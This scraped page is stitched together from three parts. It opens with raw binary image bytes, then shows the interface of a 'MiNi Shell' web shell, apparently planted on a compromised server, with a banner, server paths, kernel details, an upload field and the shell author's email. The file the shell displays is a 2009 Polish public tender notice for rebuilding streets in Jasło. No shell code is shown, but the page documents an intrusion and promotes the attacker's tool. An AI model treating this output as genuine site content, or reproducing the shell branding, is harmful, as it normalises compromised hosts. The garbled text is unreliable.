JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090223/37454-N-2009.html

<p class="kh_header"><b>Jasło: Przebudowa ulic: Kościuszki, Rynek i Kazimierza Wielkiego w Jaśle, w ramach Programu Wieloletniego pod nazwą: Narodowy Program Przebudowy Dróg Lokalnych 2008 - 2011</b><br>
<b>Numer ogłoszenia: 37454 - 2009; data zamieszczenia: 23.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Jasło , ul. Rynek 12, 38-200 Jasło, woj. podkarpackie, tel. 013 4486311, faks 013 4486360.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jaslo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ulic: Kościuszki, Rynek i Kazimierza Wielkiego w Jaśle, w ramach Programu Wieloletniego pod nazwą: Narodowy Program Przebudowy Dróg Lokalnych 2008 - 2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa ulic: Kościuszki, Rynek i Kazimierza  
Wielkiego w Jaśle polegająca na:
	a/ przebudowie nawierzchni jezdni na długości 1.390,00 m i powierzchni 13.365,00 m2  oraz 
	    nawierzchni zatoki autobusowej i parkingu o łącznej powierzchni 600,00 m2 w zakresie:
	- rozebrania istniejącej nawierzchni asfaltowej poprzez frezowanie
	- wykonania nowej nawierzchni asfaltowej gr. 6 cm. typu SMA                  
	b/ przebudowie nawierzchni chodników o łącznej powierzchni 5.469,00 m2 w zakresie:
	- wymiany zniszczonej nawierzchni z płytek betonowych i betonowej kostki brukowej na 
	   nawierzchnię z betonowej kostki brukowej i ażurowych płyt betonowych (typ Zielony parking) o łącznej powierzchni 5.469,00 m2  w tym wydzielenie miejsc postojowych dla 
	   samochodów osobowych na powierzchni 1000,00 m2 
	- wymiany zniszczonych krawężników betonowych na długości 1.683,00 m
	- wymiany zniszczonych obrzeży betonowych na długości 1.245,00 m
	- wymiany uszkodzonego betonowego muru oporowego na długości 17,00 m
	c/ przebudowie istniejącego skrzyżowania ulicy Kościuszki z ulicą Kołłątaja na skrzyżowanie  
	   z ruchem okrężnym w zakresie:
	- wymiany krawężników betonowych o łącznej długości 370,00 m
	- uzupełnienia nawierzchni przylegających chodników i wykonania wysepek kanalizujących 
	   ruch  z betonowej kostki brukowej o łącznej powierzchni 220,00 m2 
	- przeprowadzenia robót ziemnych wraz z wykonaniem  podbudowy żwirowo -  tłuczniowej 
	   gr. 80 cm na łącznej powierzchni 270,00 m2 
	- wykonania asfaltowej warstwy wiążącej gr.6 cm. na powierzchni 250,00 m2 
	- wykonania wewnętrznego pierścienia najazdowego z granitowej kostki brukowej o 
	  powierzchni 120,00 m2 wraz z okrawężnikowaniem granitowym 
	- montażu ulicznych studzienek ściekowych 6 szt. wraz z wykonaniem przyłączy 
	   kanalizacyjnych o średnicy 200 mm i łącznej długości 60,00 m
	d/regulacji pionowej i wymianie uszkodzonych włazów i pokryw studzienek podziemnej 
	   infrastruktury technicznej oraz ulicznych krat ściekowych w ilości 175 szt.
	e/ remoncie mostu w ciągu ul. Kazimierza Wielkiego, w zakresie:
	- wymiany nawierzchni asfaltowej jezdni o gr. 4 cm, na nawierzchnię asfaltową typu SMA        
	  o gr. 4 cm, na długości 70,00 m i powierzchni 644,00 m2 wraz z rozebraniem istniejącej 
	   nawierzchni asfaltowej poprzez frezowanie
	- wymiany istniejącej nawierzchni asfaltowej chodników na nawierzchnię cienkowarstwową 
	   wraz z jej wzmocnieniem na długości 140,00 m i łącznej powierzchni 294,00 m2 
	- odnowy belki gzymsowej na długości 140,00 m
	- wymiany bariero - poręczy mostowych o łącznej długości 183,50 m
	- wymiany dylatacji bitumicznej o łącznej długości 27,60 m
	- odnowy głowicy muru oporowego na długości 43,50 m
	- wymiany słupów i opraw oświetlenia mostu 4 szt.
	f/ przebudowie sygnalizacji świetlnej z dostosowaniem do obecnie obowiązujących przepisów na skrzyżowaniu ulicy Kazimierza Wielkiego z ulicami: Szajnochy i  Modrzejewskiego, w zakresie:
	- wymiany sterownika wraz z wprowadzeniem nowego programu
	- ustawienia wysięgników z sygnalizatorami nad jezdnią oraz wymiany istniejących słupów pod sygnalizatorami na nowe
	- wymiany i uzupełnienia przewodów zasilających sygnalizatory.
	g/ montażu nowych i wymianie starych słupków z łańcuchami jako trwałe elementy rozdzielenia ruchu kołowego od pieszego o łącznej długości 450,00 m
h/ wymianie istniejącego oznakowania pionowego na nowe w ilości 55 szt.
i/ uzupełnieniu i odnowie oznakowania poziomego o łącznej powierzchni 448,00 m2.  
Roboty należy wykonać  zgodnie z technologią i zakresem robót określonym w przedmiarach robót i Szczegółowych Specyfikacjach Technicznych. Na etapie zawarcia umowy Wykonawca sporządzi i uzgodni z Zamawiającym szczegółowy harmonogram rzeczowo-finansowy realizacji zadania. Harmonogram rzeczowo-finansowy będzie załącznikiem do umowy na realizację przedmiotowego zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9, 45.11.30.00-1, 45.22.11.19-9, 45.22.20.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 30 000,00 /słownie: trzydziesci tysięcy złotych/<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział wykonawcy, którzy:
	  a/  spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych
	  b/ wykonali w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności gospodarczej jest krótszy - w tym okresie, co najmniej 2 zadania polegające na budowie, remoncie lub przebudowie nawierzchni ulic i chodników o wartości nie mniejszej niż brutto 2.000.000,00 zł oraz załączą dokumenty potwierdzające, że roboty te zostały wykonane należycie.
	  c/ są ubezpieczeni od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej w zakresie obejmującym co najmniej przedmiot zamówienia
	 d/ spełniają warunki określone w Specyfikacji Istotnych Warunków Zamówienia. 
Sposób oceny spełniania w/w warunków:
Oferta winna być przygotowana zgodnie z pkt. 10 i posiadać komplet dokumentów i oświadczeń zgodnie z pkt. 6 SIWZ. Zamawiający dokona oceny spełnienia przez wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów i oświadczeń zgodnie z formułą < spełnia - nie spełnia >. Z treści załączonych     do oferty dokumentów musi wynikać jednoznacznie, że wyżej wymienione warunki wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1) Oświadczenie, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności, zgodnie z wymaganiami ustawowymi.
	2) Oświadczenie, że wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.                              
	3) Oświadczenie, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
	4) Oświadczenie, że wykonawca nie podlega wykluczeniu z postępowania o udzielenie   zamówienia zgodnie z art. 24 ust.1 i 2 ustawy Prawo zamówień publicznych.
	5) Oświadczenie o akceptacji szczegółowych warunków zamówienia określonych w SIWZ.
	6) Oświadczenie, że wykonawca uważa się za związanego ofertą przez okres 30 dni od daty składania ofert i że zobowiązuje się do zawarcia umowy w terminach określonych w art. 94 ustawy Prawo Zamówień Publicznych, na warunkach określonych w projekcie umowy (zał. Nr 4 do SIWZ). 
	    Uwaga: Oświadczenia od 1 do 6 wg zał. Nr 2 do SIWZ.

7) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji  działalności gospodarczej, wystawione nie wcześniej niż 6 m-cy przed upływem terminu składania ofert. 
	8) Kopie uprawnień i kopie zaświadczenia przynależności do Polskiej Izby Inżynierów Budownictwa kierownika robót budowlanych.
	9) Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności gospodarczej jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania (wykaz wg zał. Nr 3 do SIWZ) oraz dokumenty potwierdzające, 
	     że roboty te zostały wykonane należycie. Należy uwzględnić warunki udziału w 
	    postępowaniu,  o których mowa w pkt. 5 ppkt. b/ SIWZ.
	10) Polisa lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest 
	    ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
	    gospodarczej. Należy uwzględnić warunki udziału w postępowaniu, o których mowa w pkt. 
	    5 ppkt. c/ SIWZ.
	11) Szczegółowy kosztorys ofertowy sporządzony w oparciu o dostarczone przez Zamawiającego przedmiary robót, stanowiące załączniki Nr 5 do SIWZ i Szczegółowe  
	     Specyfikacje Techniczne stanowiące załącznik nr 7 do SIWZ.
	12) Wykonawcy występujący wspólnie:
	    Każdy z wykonawców występujących wspólnie jest zobowiązany dołączyć do oferty 
	    wszystkie wymagane dokumenty celem potwierdzenia warunków uprawniających każdego                
	    z nich oddzielnie do ubiegania się o zamówienie publiczne. Należy również dołączyć 
	    dokument ustanawiający pełnomocnictwo do reprezentowania i ewentualnie do zawarcia 
	    umowy. Wszelka korespondencja między zamawiającym a wykonawcami występującymi 
	    wspólnie będzie kierowana do ustanowionego pełnomocnika ze skutkiem dla 
	    mocodawców. Przed zawarciem umowy o udzielenie zamówienia publicznego, 
	    wykonawcy występujący wspólnie przedłożą umowę regulującą ich współpracę. 	
	13) Określenie zakresu robót, jakie wykonawca zamierza powierzyć podwykonawcom                     
	    (w przypadku gdy wykonawca nie będzie samodzielnie wykonywał zamówienia).
	UWAGA: wszystkie oświadczenia i kserokopie dokumentów muszą być podpisane przez osoby upoważnione do reprezentowania firmy składającej ofertę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wrota.podkarpackie.pl/pl/bip/gminy/um_jaslo.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Jaśle, 38-200 Jasło, ul. Rynek 12, pok. Nr 15.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.03.2009 godzina 11:00, miejsce: Urząd Miasta w Jaśle, 38-200 Jasło, ul. Rynek 12, pok. Nr 19 /Kancelaria/.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com